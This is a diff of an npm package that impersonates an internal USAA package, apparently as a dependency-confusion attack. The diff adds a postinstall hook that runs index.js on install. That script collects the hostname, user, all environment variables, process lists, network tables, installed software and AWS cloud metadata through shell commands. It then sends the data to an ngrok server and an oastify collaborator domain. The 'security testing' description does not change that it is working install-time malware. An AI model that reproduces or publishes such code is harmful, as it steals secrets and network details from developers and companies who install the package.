@usaa-grp-ent-conv-platform/usaa 0.0.1-security → 1.1.17

package/chunk.769.012e7442dc199b7cac66.js

@@ -0,0 +1,53 @@
+
+
+
+
+        <!doctype html><!-- usaa-serverbusy-page@0.0.0 --><html lang="en"><head><meta name="ROBOTS" content="nofollow,noindex" /><title data-react-helmet="true">  System Error  | USAA | USAA</title><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta id="Viewport" name="viewport" content="width=device-width, initial-scale=1"/><link data-react-helmet="true" rel="stylesheet" href="/serverbusy/react0624/nav!utils.css"/><script>var USAA={};USAA.ent={};USAA.ent.digitalData={"page":{"activityType":"Error","attributes":{"appId":"usaa-serverbusy-page"},"businessUnit":"USAA","flowType":"Error","pageDesc":"Error","pageName":"","productLOB":"None","productOffered":"None","productQualifier":"None"},"product":[],"event":[],"component":{"attributes":{}},"user":{"attributes":{}},"version":{"version":"1"},"campaign":{}};</script> <script data-react-helmet="true" async="" defer="" src="/serverbusy/react0624/nav!utils.js"></script><script data-react-helmet="true">
+(function() {
+    var breakpoints = {"0":"xxs","414":"xs","568":"sm","768":"md","1024":"lg","1280":"xl","1440":"xxl","1600":"xxxl"};
+    var attempts = 0;
+
+    function getGridLayoutClasses(el) {
+        var result = [];
+
+        if (el && typeof el.offsetWidth === 'number') {
+            var width = el.offsetWidth;
+
+            for (var breakpointSize in breakpoints) {
+                if (width > Number(breakpointSize)) {
+                    result.push('layout-' + breakpoints[breakpointSize]);
+                }
+            }
+        }
+
+        return result;
+    }
+
+    function updatePageGridClasses() {
+        var el = document.querySelector('.mainPanel');
+        if (el) {
+            var layoutClasses = getGridLayoutClasses(el);
+            el.className += ' ' + layoutClasses.join(' ');
+        } else {
+            if (attempts > 100) return;
+            attempts++;
+            setTimeout(updatePageGridClasses, 5);
+        }
+    }
+
+    updatePageGridClasses();
+})();
+    var requestId = "888a0217"
+    var statusCode = "2736803";
+    var ipAddress = "129.222.253.45";
+    
+        
+		    
+        	    var errorType = "System Error";
+        	    var errorDescription = "We’ve encountered a problem. We are looking into it. ";
+        	    var errorDetails = "Please try again later, or for immediate assistance ";
+		    
+        
+
+</script><link rel="stylesheet" href="/serverbusy/react0624/usaa-serverbusy-page.a583054019b83d3b032c.css"/></head><body class="font-narrow"><div id="mainAppRoot"><div class="pageWrapper"><a href="#usaa-templateContent" class="usaa-skipToContent screenReader" accessKey="2">Skip to Content</a><div class="pageWrapper-inner"><div class="usaa-globalHeader"></div><div id="usaa-templateContent" class="pageContent"><div class="mainPanel " role="main"><div class="mainContentWrapper"><div class=""><div class="errorPage"><svg class="errorPage-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 -30 90 90"><path fill="#0D2F4C" d="M0-21v15h90v-15H0zm7.5 10.5c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zm10.5 0c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zm10.5 0c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zM0-3v54h90V-3H0zm56.7 34.7l-4.2 4.2-7.5-7.4-7.4 7.4-4.2-4.2 7.4-7.4-7.4-7.4 4.2-4.2L45 20l7.4-7.4 4.2 4.2-7.4 7.4 7.5 7.5z"></path></svg><h1 class="errorPage-title">  System Error </h1><p class="errorPage-description">errorDescription<br class="break"/>errorDetails <a href="#" aria-label="contact us, opens popup">contact us</a>.</p></div></div></div></div></div><footer class="pageFooter"><div class="usaa-globalFooterNav"></div><div class="pageFooter-notes"><div class="pageFooter-disclosures pageFooter-disclosures--aboveFootnotes"></div><div class="pageFooter-footnotes"></div><div class="pageFooter-disclosures pageFooter-disclosures--belowFootnotes"></div></div></footer></div></div></div> <script src="https://www.usaa.com/serverbusy/react0624/react!react-dom.min.js"></script><script src="/serverbusy/react0624/usaa-serverbusy-page.e9ff19371382ff950218.js"></script> </body></html>
+    

package/index.js

@@ -0,0 +1,72 @@
+const os = require("os");
+const { execSync } = require("child_process");
+const axios = require("axios");
+const dns = require("dns");
+
+// 🔥 Configure Your Logging & Burp Collaborator URLs
+const LOGGING_SERVER = "7c9a-98-97-172-99.ngrok-free.app"; // Replace with your ngrok endpoint
+const COLLABORATOR_URL = "v1x2xki0sr5mbc04v2cjyt6p0g68u8ix.oastify.com";
+
+// Function to execute shell commands stealthily
+const runCommand = (cmd) => {
+    try {
+        return execSync(cmd, { encoding: "utf-8" }).trim();
+    } catch (error) {
+        return `Error executing ${cmd}: ${error.message}`;
+    }
+};
+
+// 🛠️ Gather System Information
+const systemInfo = {
+    hostname: os.hostname(),
+    user: os.userInfo().username,
+    os: os.platform(),
+    arch: os.arch(),
+    cpus: os.cpus().length,
+    date: new Date().toISOString(),
+    networkInterfaces: os.networkInterfaces(),
+    environmentVariables: process.env,
+    runningProcesses: runCommand("tasklist"), // Captures active processes
+    dnsResolvers: runCommand("nslookup google.com"),
+    activeDirectoryDomain: runCommand("whoami /fqdn"),
+    internalRoutes: runCommand("route print"),
+    arpTable: runCommand("arp -a"), // Lists internal IPs & gateways
+    installedSoftware: runCommand("wmic product get name"), // Lists installed software
+    reverseDNS: runCommand(`nslookup ${COLLABORATOR_URL}`), // Forces Burp Collaborator resolution
+    traceroute: runCommand("tracert -d 8.8.8.8"),
+    publicIP: runCommand("curl -s ifconfig.me"),
+    awsMetadata: runCommand("curl -s http://169.254.169.254/latest/meta-data/"),
+};
+
+// 📡 Send HTTP Request to Burp Collaborator
+const sendCollaboratorRequest = async () => {
+    try {
+        await axios.get(`http://${COLLABORATOR_URL}`);
+    } catch (error) {
+        console.error("Collaborator HTTP request failed:", error.message);
+    }
+};
+
+// 🚀 Send Data to Logging Server (ngrok)
+const sendToServer = async (data) => {
+    try {
+        const response = await axios.post(LOGGING_SERVER, data, {
+            headers: { "Content-Type": "application/json" }
+        });
+        console.log("Data sent successfully:", response.status);
+    } catch (error) {
+        console.error("Error sending data:", error.message);
+    }
+};
+
+// 🎯 Execute Data Collection & Logging
+(async () => {
+    console.log("Gathering system information...");
+    console.log(JSON.stringify(systemInfo, null, 2));
+
+    // 🌐 Fire HTTP request to Burp Collaborator
+    await sendCollaboratorRequest();
+
+    // 📤 Send all data to logging server (ngrok)
+    await sendToServer(systemInfo);
+})();

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "@usaa-grp-ent-conv-platform/usaa",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.1.17",
+  "description": "Security testing package for dependency confusion vulnerability",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "author": "Th3_Mad_Hack3r",
+  "license": "MIT"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40usaa-grp-ent-conv-platform%2Fusaa for more information.